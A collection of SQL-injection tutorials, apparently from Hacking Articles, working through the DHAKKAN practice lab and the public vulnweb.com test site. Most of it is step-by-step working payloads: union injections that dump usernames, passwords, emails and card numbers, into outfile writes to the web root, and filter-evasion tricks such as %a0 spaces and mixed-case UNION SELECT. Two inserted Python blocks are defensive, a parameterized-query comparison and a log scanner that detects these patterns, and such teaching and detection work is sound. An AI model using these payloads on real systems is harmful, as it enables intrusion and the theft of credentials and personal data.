Dumping Database using Outfile

In our previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. Today we are going to use the SELECT ... INTO OUTFILE statement, which is the easiest way of exporting a table's records into a text file or an Excel file.

This statement lets a user write table data very rapidly to a text file on the server machine. SELECT ... INTO OUTFILE writes the selected rows to a file and allows column and row terminators to be used to specify the output format. The output file is created directly by the MySQL server, so the filename must be given with the path where the file should be written on the server host. The file must not already exist on the server; it cannot be overwritten. The user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and enter the following URL:

http://localhost:81/sqli/Less-7/?id=1

From the screenshot you can read “You are in….. Use outfile”; now let’s try to break this statement.

OKAY! The query has been broken successfully: we receive an error message when we use a single quote (') to break the query, which confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1'

After a lot of effort the query finally gets fixed. If you notice, the steps for SQL injection are the same as in the previous chapter; only the technique used to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1')) --+

Now the following query will dump the result into a text file. Here you need to give the path where the file should be written on the server host. The file must not already exist on the server, so always use a new text file name when writing out database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot you can see that it is still showing the error message; now open another tab to view the output of the query.

http://localhost:81/sqli/Less-7/

Now add the file name hack1.txt to check the output of the above query.

http://localhost:81/sqli/Less-7/hack1.txt

Hence you can see we get the output of the executed query inside the text file. The hack1.txt file is also saved on the server machine.

Execute the following query to retrieve the database name using union injection, writing to a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully got security as the database name.

The next query will provide all table names saved inside the database, using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains many columns; I chose only two of them for further enumeration.

C1: username

C2: password

Finally, execute the following query to read all usernames and passwords from the users table.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From the screenshot you can read the usernames and passwords saved inside the text file.

Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output into an Excel (CSV) file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Form Based SQL Injection Manually

In our previous article we performed form-based SQL injection using sqlmap, but today we are going to perform form-based SQL injection in DHAKKAN manually. There are many examples of login forms, like the Facebook login, the Gmail login and other online accounts, which ask you to submit your username and password.

Let’s start!! 

LESSON 11

This lesson is much like lessons 1, 2, 3 and 4; if you are not familiar with those lessons, please go through them from here. You will come to know how to perform SQL injection manually, step by step, in order to retrieve data from the database system.

Lesson 11 is a POST error-based single-quote (') string injection, so when you open this lab in the browser you will observe that it contains text fields for a username and password to log in to the web server. As we are not a legitimate user we don't know the correct username and password, but as a hacker we always wish to get inside the database with the help of SQL injection. Therefore we will first test whether the database is vulnerable to SQL injection or not.

Since the lesson itself is described as error-based single-quote (') string injection, I used a single quote (') to break the query inside the username text field and then clicked submit.

Username: '

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near ''' and password='' LIMIT 0,1'

Now we need to fix this query with the help of a # (hash) comment; so after the single quote (') add a hash (#) to make it syntactically correct.

Username: ' #

From the screenshot you can see it shows that the login attempt failed, though we have successfully fixed the blue error message.

Now whatever statement you insert between ' and # will execute successfully, with a result according to it. To find out the number of columns used in the backend query we'll use the ORDER BY clause.

Username: ' order by 1 #

Username: ' order by 2 #

Username: ' order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a union select query between ' and # to select both records.

Username: ' union select 1,2 #

From the screenshot you can see it also shows a successful login; now retrieve data from inside it.

The next query will fetch the database name; it is similar to lesson 1, and from the screenshot you can read the database name “security”.

Username: ' union select 1,database() #

Through the query given below we will be able to fetch the table names present inside the database.

Username: ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

Username: ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

Finally, execute the following query to read all usernames and passwords from the users table.

Username: ' union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials; now use them to log in.

This is all about single-quote string error-based injection in lesson 11.

Lesson 12

In some scenarios you will try a single-quote string to test for SQL vulnerability, or go further and try to break the query even after knowing that the database is vulnerable, but you will not be able to break the query and receive an error message, because the developer might have blacklisted the single quote (') in the backend query.

Lesson 12 is similar to lesson 11, but here you will fail if you use single quotes to break the query, since the chapter is described as POST error-based double-quote string ("). Thus I used a double quote (") to break the query inside the username text field and then clicked submit.

Username: "

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near '"") and password=("") LIMIT 0,1'

Now we need to fix this query with the help of a closing parenthesis ) and a # (hash) comment; so after the double quote (") add a closing parenthesis ) and a hash (#) to make it syntactically correct.

Username: ") #

From the screenshot you can see it shows that the login attempt failed, though we have successfully fixed the blue error message.

Now whatever statement you insert between ") and # will execute successfully, with a result according to it. To find out the number of columns used in the backend query we'll use the ORDER BY clause.

Username: ") order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a union select query between ") and # to select both records.

Username: ") union select 1,2 #

From the screenshot you can see it also shows a successful login; let’s now retrieve data from inside it.

The next query will fetch the database name; it is similar to lesson 1, and from the screenshot you can read the database name “security”.

Username: ") union select 1,database() #

Through the query given below we will be able to fetch the table names present inside the database.

Username: ") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

Username: ") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

Finally, execute the following query to read all usernames and passwords from the users table.

Username: ") union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials; now use them to log in.

This is all about double-quote string error-based injection in lesson 12.
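The lesson 11 login query, reconstructed from the error text quoted above (... and password='' LIMIT 0,1), shown string-built as in the lab beside the parameterized form that closes the hole. This is an added example, not the DHAKKAN lab's own code: an in-memory SQLite table with constructed accounts stands in for the MySQL users table, and because SQLite does not accept MySQL's # comment the union payload is written with -- instead.

```python
"""Lesson 11 login query, string-built as in the lab, beside a parameterized one.

Added example, not the DHAKKAN lab's own code. An in-memory SQLite table with
constructed accounts stands in for the MySQL users table; SQLite does not
accept MySQL's # comment, so the probe below ends in -- instead.
"""
import sqlite3
from typing import Any

# Shape recovered from the error the article quotes: ... and password='' LIMIT 0,1
VULNERABLE_TEMPLATE = (
    "SELECT username, password FROM users "
    "WHERE username='{u}' AND password='{p}' LIMIT 0,1"
)
# Same statement with bind parameters: the driver sends input as data, never as SQL.
SAFE_QUERY = (
    "SELECT username, password FROM users "
    "WHERE username=? AND password=? LIMIT 0,1"
)


def fresh_db() -> sqlite3.Connection:
    """Constructed sample table; the credentials are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "example-pw-1"), ("bob", "example-pw-2")],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Any:
    """Concatenates input into SQL. Returns the matched row, or the DB error text."""
    sql = VULNERABLE_TEMPLATE.format(u=username, p=password)
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:          # the "blue" error message the article shows
        return "error: " + str(exc)


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Any:
    """Binds input as parameters; a quote or UNION in the input is just text."""
    return conn.execute(SAFE_QUERY, (username, password)).fetchone()


if __name__ == "__main__":
    db = fresh_db()
    probe = "'"                            # the lone quote from the article
    payload = "' union select 1,2 --"      # the lesson 11 union, # written as --
    print("vulnerable, probe  :", vulnerable_login(db, probe, ""))      # syntax error
    print("vulnerable, payload:", vulnerable_login(db, payload, ""))    # (1, 2)
    print("safe, payload      :", safe_login(db, payload, ""))          # None
    print("safe, real login   :", safe_login(db, "alice", "example-pw-1"))
```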


How to Bypass SQL Injection Filter Manually

In the previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. The reason is the protection the developer has applied to prevent SQL injection: sometimes developers use filters to strip out certain characters and operators from the user input before adding it to the SQL statement. Today’s article will help you face such situations and will show you how to bypass such filters. Here again we’ll be using the DHAKKAN SQLi labs for practice.

 Let’s start!!

LESSON 25

In lab 25 the OR and AND keywords are blocked, so here we will try to bypass the SQL filter using their substitutes.

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);     // strip out OR (case-insensitive)
    $id = preg_replace('/AND/i', "", $id);    // strip out AND (case-insensitive)
    return $id;
}

Since the alphabetic words OR and AND are blacklisted, if we use AND 1=1 or OR 1=1 there would be no output; therefore I used %26%26 inside the query.

The following are replacements for AND and OR:

AND: && (URL-encoded as %26%26)

OR: ||

Open the browser and enter the following URL:

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From the screenshot you can see we have successfully fixed the query by writing AND as &&, URL-encoded as %26%26, even though the AND operator was filtered out.

Once the concept of bypassing the AND filter is clear, we need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Enter the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

Hence you can see we have successfully got security as the database name.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 --+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='users' %26%26 1=1 --+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

Finally, execute the following query to read all usernames from the users table.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From the screenshot you can read the fetched data.

Hence in lesson 25 we have learned how to bypass the AND and OR filters to retrieve information from the database.

LESSON 26

You will find lab 26 more challenging because here spaces, comments, OR and AND are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id):

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);          // strip out OR (case-insensitive)
    $id = preg_replace('/and/i', "", $id);         // strip out AND (case-insensitive)
    $id = preg_replace('/[\/\*]/', "", $id);       // strip out / and * (kills /* */ comments)
    $id = preg_replace('/[--]/', "", $id);         // strip out - (kills -- comments)
    $id = preg_replace('/[#]/', "", $id);          // strip out #
    $id = preg_replace('/[\s]/', "", $id);         // strip out whitespace; \s does not match the 0xA0 byte, which is why %a0 still works as a separator
    $id = preg_replace('/[\/\\\\]/', "", $id);     // strip out slashes
    return $id;
}

This lab has more filters than lab 25 because here spaces and comments are also blocked. Now execute the following query in the URL.

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From the screenshot you can see we have successfully fixed the query by replacing the space with its URL-encoded substitute %a0.

Blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%a0')

Once the concept of bypassing the AND, OR and space filters is clear, we need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Enter the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully got security as the database name.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see the columns inside it.

C1: id

C2: username

C3: password

Finally, execute the following query to read all usernames from the users table.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

From the screenshot you can read the fetched data.

Hence in lesson 26 we have learned how to bypass the AND, OR, space and comment filters to retrieve information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, spaces and comments are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id):

function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);     // strip out / and *
    $id = preg_replace('/[--]/', "", $id);       // strip out -
    $id = preg_replace('/[#]/', "", $id);        // strip out #
    $id = preg_replace('/[ +]/', "", $id);       // strip out spaces and +
    $id = preg_replace('/select/m', "", $id);    // strip out select
    $id = preg_replace('/[ +]/', "", $id);       // strip out spaces and + (repeated in the lab source)
    $id = preg_replace('/union/s', "", $id);     // strip out union
    $id = preg_replace('/select/s', "", $id);    // strip out select
    $id = preg_replace('/UNION/s', "", $id);     // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);    // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);     // strip out Union
    $id = preg_replace('/Select/s', "", $id);    // strip out Select
    return $id;                                  // none of the keyword patterns use /i, so other casings pass through
}

This lab has more filters in addition to lab 26 because here union, select, spaces and comments are also blocked. Now execute the following query in the URL.

http://localhost:81/sqli/Less-27/?id=1' AND'1=1

Once the concept of bypassing the UNION/union, SELECT/select and space filters is clear, we need to alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

In the screenshot you can see I wrote union as UnIon and select as SeLect in the query to bypass the filter.


Now enter the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully got security as the database name.

The next query will provide all table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see the columns inside it.

C1: id

C2: username

C3: password

Finally, execute the following query to read all usernames from the users table.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

From the screenshot you can read the fetched data.

Hence in lesson 27 we have learned how to bypass the UNION/union, SELECT/select, space and comment filters to retrieve information from the database.
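Seen from the server side, every trick in lessons 7 and 25 to 27 (the %a0 separator, UnIon/SeLect case mixing, the stuffed infoorrmation_schema, the &&/|| substitutes and into outfile) leaves a distinctive trace in the access log once the request path is percent-decoded. The scanner below is an added example, not part of this article or of the lab: it decodes each request, flags the SQL constructs and separately reports which evasion was used. The log lines are constructed to mirror the article's requests and assume Apache combined format; the signature and evasion names are my own.

```python
"""Flag the URL-level filter evasions from lessons 7 and 25-27 in web access logs.

Added example, not part of the article or the lab. The log lines are
constructed to mirror the article's requests and assume Apache combined
format; the signature and evasion names are mine.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample lines: one benign request, then five from the article.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2017:12:00:01 +0000] "GET /sqli/Less-25/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2017:12:00:02 +0000] "GET /sqli/Less-25/?id=-1'%20union%20select%201,database(),3%20%26%26%201=1%20--+ HTTP/1.1" 200 420
10.0.0.5 - - [10/Oct/2017:12:00:03 +0000] "GET /sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1 HTTP/1.1" 200 420
10.0.0.5 - - [10/Oct/2017:12:00:04 +0000] "GET /sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1 HTTP/1.1" 200 420
10.0.0.5 - - [10/Oct/2017:12:00:05 +0000] "GET /sqli/Less-7/?id=1'))%20union%20select%201,2,3%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack1.txt%22%20--+ HTTP/1.1" 200 300
10.0.0.5 - - [10/Oct/2017:12:00:06 +0000] "GET /sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1 HTTP/1.1" 200 420
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Applied to the decoded, whitespace-collapsed, lower-cased request path.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
    # infoorrmation_schema becomes information_schema once the lab strips "or"
    "information_schema": re.compile(r"\binfo(?:or|and)*rmation_schema\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "symbolic_boolean": re.compile(r"(?:&&|\|\|)\s*'?\d+\s*="),   # && / || for AND / OR
}


def decode_path(raw_path: str) -> str:
    """Percent-decode; latin-1 keeps %a0 as U+00A0 instead of a replacement char."""
    return unquote_plus(raw_path, encoding="latin-1")


def evasions(decoded: str) -> List[str]:
    """Filter-evasion tricks that are only visible before normalization."""
    found = []
    if re.search(r"[\t\n\x0b\x0c\r\xa0]", decoded):
        found.append("nonstandard_whitespace")          # %09 %0a %0b %0c %0d %a0
    words = re.findall(r"\b(?:union|select)\b", decoded, flags=re.I)
    if any(w != w.lower() and w != w.upper() for w in words):
        found.append("mixed_case_keyword")              # UnIon / SeLect
    if re.search(r"info(?:or|and)+rmation", decoded, flags=re.I):
        found.append("keyword_stuffing")                # infoorrmation_schema
    return found


def analyze(line: str) -> Optional[Dict[str, object]]:
    """One finding per log line, or None when no SQL-like content is present."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    decoded = decode_path(match.group("path"))
    normalized = re.sub(r"\s+", " ", decoded).lower()   # \s also covers U+00A0
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalized)]
    if not hits:
        return None
    return {"path": match.group("path"), "signatures": hits, "evasions": evasions(decoded)}


def scan(log_text: str) -> List[Dict[str, object]]:
    """Findings for every flagged line, in log order."""
    return [f for f in map(analyze, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["signatures"], finding["evasions"], finding["path"])
```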


Manual SQL Injection Exploitation Step by Step

This article is based on our previous article, where you learned different techniques to perform SQL injection manually using DHAKKAN. Today we are again performing SQL injection manually, this time on the live test website “vulnweb.com”, to spare you the effort of setting up DHAKKAN.

We are going to apply the same concepts and techniques as performed in DHAKKAN on a different platform.

 Let’s begin!

http://www.hackingarticles.in/beginner-guide-sql-injection-part-1/

Open the target URL given below in the browser:

http://testphp.vulnweb.com/artist.php?artist=1

So here we are going to test SQL injection for “artist=1”.

Now use the error-based technique by adding an apostrophe (') at the end of the input, which will try to break the query.

testphp.vulnweb.com/artists.php?artist=1'

In the given screenshot you can see we got an error message, which means the running site is vulnerable to SQL injection.

Now use the ORDER BY keyword, which sorts the records in ascending or descending order, for artist=1:

http://testphp.vulnweb.com/artists.php?artist=1 order by 1

Similarly repeat for order by 2, 3 and so on, one by one.

http://testphp.vulnweb.com/artists.php?artist=1 order by 2

http://testphp.vulnweb.com/artists.php?artist=1 order by 4

From the screenshot you can see we got an error at order by 4, which means the query has only three columns.

Let’s penetrate further using union-based injection to select data from different tables.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

From the screenshot you can see it shows the result for only one table, not for the others.

Now try to pass a wrong input to the database through the URL by replacing artist=1 with artist=-1 as given below:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

Hence you can see it is now showing the result for the remaining two tables as well.

Use the next query to fetch the name of the database:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3

From the screenshot you can read the database name acuart.

The next query will extract the current username as well as the version of the database system.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()

Here we have retrieved 5.1.73-0ubuntu0.10.04.1 as the version and acuart@localhost as the current user.

Through the next query we will try to fetch the table names inside the database.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1

From the screenshot you can see the name of the first table is carts.

Similarly, repeat the same query for the next table with a slight change:

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 3: featured

Similarly, repeat the same query for tables 4, 5, 6 and 7 by making slight changes to the LIMIT.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1

Since we didn’t get anything when the limit is set to 8,1, there might be only 7 tables inside the database.

The group_concat function is used to concatenate two or more strings into a single string.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From the screenshot you can see that through the group_concat function we have successfully retrieved all the table names inside the database.

Table1: artist

Table2: Carts

Table3: Featured

Table4: Guestbook

Table5: Pictures

Table6: Product

Table7: users

Maybe we can get some important data from the users table, so let’s penetrate further. Again use the group_concat function on the table users to retrieve all of its column names.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

Awesome!! We successfully retrieved all eight column names from inside the table users.

Then I chose only four columns, i.e. uname, pass, email and cc, for further enumeration.

Use the group_concat function to select uname from the table users by executing the following query through the URL:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users

From the screenshot you can read uname: test

Use the group_concat function to select pass from the table users by executing the following query through the URL:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users

From the screenshot you can read pass: test

Use the group_concat function to select cc (credit card) from the table users by executing the following query through the URL:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users

From the screenshot you can read cc: 1234-5678-2300-9000

Use the group_concat function to select email from the table users by executing the following query through the URL:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users

From the screenshot you can read email: jitendra@panalinks.com

 Enjoy hacking!!
